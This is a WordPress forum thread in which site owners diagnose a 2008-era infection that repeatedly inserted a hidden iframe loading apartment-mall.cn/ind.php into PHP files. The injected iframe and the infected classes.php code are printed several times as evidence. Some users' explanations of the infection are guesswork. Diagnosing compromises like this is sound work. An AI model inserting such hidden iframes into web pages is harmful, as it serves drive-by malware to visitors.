WordPress.org

Ready to get started?Download WordPress

Forums

Files in wp-includes keep changing (18 posts)

  1. coalminecanary
    Member
    Posted 6 years ago #

    Twice now, I have gone to my wordpress install and found that it is throwing PHP errors. I only installed this on the 27th of april, and now on the 3rd day I'm having this happen for a second time.

    My host assures me there was no activity on their server that could have corrupted these files.

    All of the files in wp-includes appear to have new timestamps when this happens, but all other files on the server are fine. If I re-upload the original files form the release package, everything works again.

    For now I have left it in error state at http://www.amykenny.ca in case you want to see the errors.

    Is there anything within wp that could be trying to write info into these files? I'd suspect hacking except there have been no problems with any other fiels ever on my server, just this one directory over the last 2 days...

    Thanks!

  2. whooami
    Member
    Posted 6 years ago #

    All of the files in wp-includes appear to have new timestamps when this happens ...

    Is there anything within wp that could be trying to write info into these files?

    No.

    Did you look at the source of that page?

    You might want to. See that iframe?

    <iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>?>

  3. hemasunder
    Member
    Posted 6 years ago #

    <iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>?>

    this is the problem, what is the solution for that

  4. coalminecanary
    Member
    Posted 6 years ago #

    Interesting.

    So on my webserver, the end of classes.php looks like this:

    function send() {
    		header('Content-Type: text/xml');
    		echo "<?xml version='1.0' standalone='yes'
    echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';
    ?>		foreach ( $this->responses as $response )
    			echo $response;
    		echo '</wp_ajax>';
    		die();
    	}
    }
    
    ?>
    ?>
    ?>

    And my local copy is:

    function send() {
    		header('Content-Type: text/xml');
    		echo "<?xml version='1.0' standalone='yes'?><wp_ajax>";
    		foreach ( $this->responses as $response )
    			echo $response;
    		echo '</wp_ajax>';
    		die();
    	}
    }
    
    ?>

    So, is there something in WP that could allow external access to wp-includes folder? This definitely appears to be bot-like... search and replace of header text...

    I will check with ISP as well.

    Thanks!

  5. dondakaya
    Member
    Posted 6 years ago #

    My website's php files were also modified to include this line on 29 apr 08 at 22:55 pm (godaddy server time). So its not only the prob with word press. I think this is new kind of virus spreadin around.

    If you observe it, it adds the link to the last line of the first PHP block it encounters.

  6. dondakaya
    Member
    Posted 6 years ago #

    coolmine > at first we can consider this as a hack only on godaddy servers.

    hemasunder > just replace the files. right now that is the only solution i can see.

  7. coalminecanary
    Member
    Posted 6 years ago #

    For the record, My host is dreamhost.

    Was this happening on all of your php files? Or just certain directories? just wordpress files?

  8. dondakaya
    Member
    Posted 6 years ago #

    it was only for certain dirs and files, not all. dirs like.. scripts, core. files like contact.php, search.php, login.php. FYI, i dont have any word press files in my website. I am posting here because of the http://apartment-mall.cn/ind.php problem.

  9. coalminecanary
    Member
    Posted 6 years ago #

    This is only happening to my wordpress includes directory. I have lots of other PHp files on the server under the same ftp login. wp-includes only has write access by owner, I double checked that...

  10. sanmarco
    Member
    Posted 6 years ago #

    hi, I had the same problem, the hack by apartment-mall. Its only affecting all php and all html files. I delete them one time than they got rewritten! The safe way to do it. Dont ope your website where the hack messed everything up because it will put an load.exe on your desktop. If you than try to delete all php and html files this application rewrite it. I had this problem. Went to another pc, use the ftp programm to delete the php and html files or just overwrite them with the clean ones from my back up. Now its ok. Make sure you check all your directories!! Also may check your chmod status, if it is on 777 so thats may the loophole where the hack goes in and mess everything up. My chmod was on 777.

    Yes its alwys only writing the i-frame thing below in the last row!
    sanmarco

  11. sanmarco
    Member
    Posted 6 years ago #

    I forgot, it was not only attacking my wordpress files, also my textpattern files I use now mostly. But I guess the wordpress files I still had on my host went the entrance for the hack. Because I check in textpattern forums and there was not postings about his hack yet.

  12. coalminecanary
    Member
    Posted 6 years ago #

    So wait, this is a program ON the webserver that caused it for you?

    Or a program on the computer with which you FTP into the webserver?

    THanks!

  13. sanmarco
    Member
    Posted 6 years ago #

    I guess its a programm on the computer. It is a programm downloaded when it links and open to this apartment-mall website. I try two pc in a internetcafe, both time it downloaded a so calling "load.exe" from aparment-mall.cn onto the destop. This happened in the background during the browser try to open my website. At the third pc than I avoided to open my infected website. It was working sucessful when i deleted the files with my ftp programm. I used a ftp programm working from a memory stick. But also I deleted all the wordpress tables in my database to make sure there is nothing stored too. Because i was not sure. They went useless anyway as i use now textpattern.
    My guess is that this load.exe "knows" when you enter per ftp into your webspace. As soon you delete or rewrite the files it rewrites it again.
    I was also not able to delete this load.exe from the desktop or drag it into the recycle bin. Therefore my theorie that its the programm ON the computer. Hope this info can help you guys.

    Sanmarco

  14. dondakaya
    Member
    Posted 6 years ago #

    Upon testing the infected scripts on IE7, the ind.php actually tries to install an active x control on IE, disguised in the name of microsoft.

    if you have avast antivirus, you can block the website, so browser will not download any thing from that website. later, replace the files in the ftp. i think this is new virus so it will take some time to write antivirus.

  15. dondakaya
    Member
    Posted 6 years ago #

    this link might be useful - http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml

    the article is big, but read it to know it. it says that its the mpack server that does all this.

  16. coalminecanary
    Member
    Posted 6 years ago #

    Hm

    So what I am wondering is HOW these php files are getting writen over?

    When I replace them with FTP, the site works for some time.

    THen later on, the site is broken and all of the wp-includes failes have been edited by whatever script.

    My site is hosted remotely by dreamhost in a unix based server. my guess is that the bot is accessing these files through some sort of exploit

    wordpress is the ONLY thing installed on this website!

  17. sanmarco
    Member
    Posted 6 years ago #

    #coalmine
    ok may check this:
    go into your database and see if there are two tables called smething zenmas or similar (i dont remmber it exactly) I had two of this tables in my datebase never ever any of my php scripts install it there. I forgot to mention that yesterday. If you see them, delete them. Maybe the hack write something into the database...

    #donokakya
    yes this load.exe is that active x control. But intersting that it only downloads it with IE7

  18. coalminecanary
    Member
    Posted 6 years ago #

    OK does any of this look suspect in the database?

    wp_comments				1  	6.2 KiB  	-
    wp_links 				7 	4.5 KiB 	-
    wp_options 				149 485.0 KiB 	608 B
    wp_postmeta 			42 	9.5 KiB 	96 B
    wp_posts 				21 	31.8 KiB 	-
    wp_terms 				13 	5.5 KiB 	-
    wp_term_relationships 	27 	3.6 KiB 	-
    wp_term_taxonomy 		13 	3.6 KiB 	-
    wp_usermeta 			15 	8.3 KiB 	-
    wp_users 				2 	4.2 KiB 	-
    wp_yapbimage 			16 	4.0 KiB 	-
    11 table(s) 	Sum 	306 	566.3 KiB 	704 B

    Also, where does WP stoer the database user info? I should verify that it is not world readable, right? After install I was not directed to change any file permissions so its possible that the db login is in a world readable file...

    This is where I will start as well as changing passwords, and seewhat happens.

    THanks!

Topic Closed

This topic has been closed to new replies.

About this Topic